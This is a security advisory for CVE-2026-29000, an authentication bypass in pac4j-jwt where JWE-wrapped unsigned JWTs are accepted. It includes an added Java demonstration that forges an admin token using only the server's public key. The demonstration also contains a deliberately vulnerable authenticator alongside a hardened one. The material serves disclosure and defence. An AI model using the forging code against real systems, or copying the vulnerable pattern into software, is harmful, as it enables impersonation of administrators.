PT-2026-23074 · Pac4J-Jwt

Amartya Jha · Published 2026-03-04 · Updated 2026-03-16

CVE-2026-29000 · CVSS v3.1: 10.0 · Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
Name of the Vulnerable Software and Affected Versions: pac4j-jwt versions prior to 4.5.9, 5.7.9, and 6.3.3
Description: The JwtAuthenticator component of the pac4j-jwt library does not correctly enforce signature verification on encrypted JWTs. An attacker who holds the server's RSA public key (the key tokens are encrypted to) can build an unsigned JWT (a PlainJWT, alg "none") carrying arbitrary subject and role claims, wrap it in a JWE encrypted to that public key, and present the JWE-wrapped PlainJWT to the application. JwtAuthenticator decrypts the JWE and accepts the inner claims without requiring a valid signature, so the attacker can authenticate as any user, including administrators. The root cause is that the library treats the decrypted payload as an authenticated token: successful decryption shows only that the sender had the public key, not that the claims were issued by the holder of the signing key.
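The following added example is not pac4j's code and does not come from this advisory; it shows the token shape the description refers to and the check that defeats it. It uses nimbus-jose-jwt, the JOSE library pac4j-jwt builds on, and generates an RSA key pair locally in place of the server's and issuer's keys. The method names forgeJweWrappedPlainJwt, issueSignedThenEncrypted, vulnerableAuthenticate and hardenedAuthenticate are hypothetical and are not pac4j APIs.

```java
// Added demonstration, not pac4j's own code. Assumes nimbus-jose-jwt on the
// classpath; the generated RSA key pairs stand in for the server's and issuer's keys.
import com.nimbusds.jose.*;
import com.nimbusds.jose.crypto.*;
import com.nimbusds.jwt.*;
import java.security.*;
import java.security.interfaces.*;
import java.util.Date;

public class JweWrappedPlainJwtDemo {

    static final JWEHeader JWE_HEADER =
            new JWEHeader(JWEAlgorithm.RSA_OAEP_256, EncryptionMethod.A256GCM);

    // Attacker side: needs only the server's RSA *public* key. The inner token is a
    // PlainJWT (alg "none"), so no signing key is involved at all.
    static String forgeJweWrappedPlainJwt(RSAPublicKey serverPublicKey) throws Exception {
        JWTClaimsSet claims = new JWTClaimsSet.Builder()
                .subject("admin")                                  // arbitrary subject
                .claim("roles", "ROLE_ADMIN")                      // arbitrary roles
                .expirationTime(new Date(System.currentTimeMillis() + 600_000))
                .build();
        JWEObject jwe = new JWEObject(JWE_HEADER, new Payload(new PlainJWT(claims).serialize()));
        jwe.encrypt(new RSAEncrypter(serverPublicKey));
        return jwe.serialize();
    }

    // Legitimate issuer: sign with the issuer's private key, then encrypt to the server.
    static String issueSignedThenEncrypted(JWTClaimsSet claims, RSAPrivateKey signingKey,
                                           RSAPublicKey serverPublicKey) throws Exception {
        SignedJWT signed = new SignedJWT(new JWSHeader(JWSAlgorithm.RS256), claims);
        signed.sign(new RSASSASigner(signingKey));
        JWEObject jwe = new JWEObject(JWE_HEADER, new Payload(signed));
        jwe.encrypt(new RSAEncrypter(serverPublicKey));
        return jwe.serialize();
    }

    // VULNERABLE pattern: decrypt, re-parse whatever is inside, and accept it.
    static JWTClaimsSet vulnerableAuthenticate(String token, RSAPrivateKey decryptKey) throws Exception {
        JWT jwt = JWTParser.parse(token);
        if (jwt instanceof EncryptedJWT) {
            EncryptedJWT encrypted = (EncryptedJWT) jwt;
            encrypted.decrypt(new RSADecrypter(decryptKey));
            jwt = JWTParser.parse(encrypted.getPayload().toString());
        }
        // BUG: a PlainJWT carries no signature, yet its claims are returned as trusted.
        return jwt.getJWTClaimsSet();
    }

    // HARDENED pattern: decryption is not authentication; the inner token must be a
    // SignedJWT whose signature verifies under the expected algorithm and key.
    static JWTClaimsSet hardenedAuthenticate(String token, RSAPrivateKey decryptKey,
                                             RSAPublicKey verifyKey) throws Exception {
        JWT jwt = JWTParser.parse(token);
        if (jwt instanceof EncryptedJWT) {
            EncryptedJWT encrypted = (EncryptedJWT) jwt;
            encrypted.decrypt(new RSADecrypter(decryptKey));
            // toSignedJWT() returns null unless the decrypted payload is a compact JWS.
            jwt = encrypted.getPayload().toSignedJWT();
        }
        if (!(jwt instanceof SignedJWT)) {
            throw new SecurityException("token is not a signed JWT");
        }
        SignedJWT signed = (SignedJWT) jwt;
        if (!JWSAlgorithm.RS256.equals(signed.getHeader().getAlgorithm())
                || !signed.verify(new RSASSAVerifier(verifyKey))) {
            throw new SecurityException("signature verification failed");
        }
        // Expiry, issuer and audience checks would follow here in real code.
        return signed.getJWTClaimsSet();
    }

    public static void main(String[] args) throws Exception {
        KeyPairGenerator gen = KeyPairGenerator.getInstance("RSA");
        gen.initialize(2048);
        KeyPair serverKey = gen.generateKeyPair();   // stand-in for the server's key pair
        KeyPair issuerKey = gen.generateKeyPair();   // stand-in for the token issuer's key pair
        RSAPublicKey serverPub = (RSAPublicKey) serverKey.getPublic();
        RSAPrivateKey serverPriv = (RSAPrivateKey) serverKey.getPrivate();

        String forged = forgeJweWrappedPlainJwt(serverPub);
        System.out.println("vulnerable accepts: sub=" + vulnerableAuthenticate(forged, serverPriv).getSubject());
        try {
            hardenedAuthenticate(forged, serverPriv, (RSAPublicKey) issuerKey.getPublic());
        } catch (SecurityException e) {
            System.out.println("hardened rejects: " + e.getMessage());
        }

        JWTClaimsSet legit = new JWTClaimsSet.Builder().subject("alice").build();
        String good = issueSignedThenEncrypted(legit, (RSAPrivateKey) issuerKey.getPrivate(), serverPub);
        System.out.println("hardened accepts legitimate token: sub="
                + hardenedAuthenticate(good, serverPriv, (RSAPublicKey) issuerKey.getPublic()).getSubject());
    }
}
```

Compile with nimbus-jose-jwt (Maven coordinate com.nimbusds:nimbus-jose-jwt) on the classpath. The vulnerable path returns sub=admin for a token nobody signed; the hardened path rejects it because Payload.toSignedJWT() yields null for a PlainJWT, and still accepts the properly signed-then-encrypted token. The general rule the example illustrates: a JWE proves confidentiality to the recipient, never origin, so authentication must always rest on a verified signature (or, for symmetric setups, an authenticated key only the issuer holds) inside the envelope.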
Recommendations: Upgrade to a fixed release of the branch in use: pac4j-jwt 4.5.9 or later (4.x), 5.7.9 or later (5.x), or 6.3.3 or later (6.x).


Weakness Enumeration

CWE-347: Improper Verification of Cryptographic Signature

Related Identifiers

BDU:2026-02532
CVE-2026-29000
GHSA-PM7G-W2CF-Q238

Affected Products

Pac4J-Jwt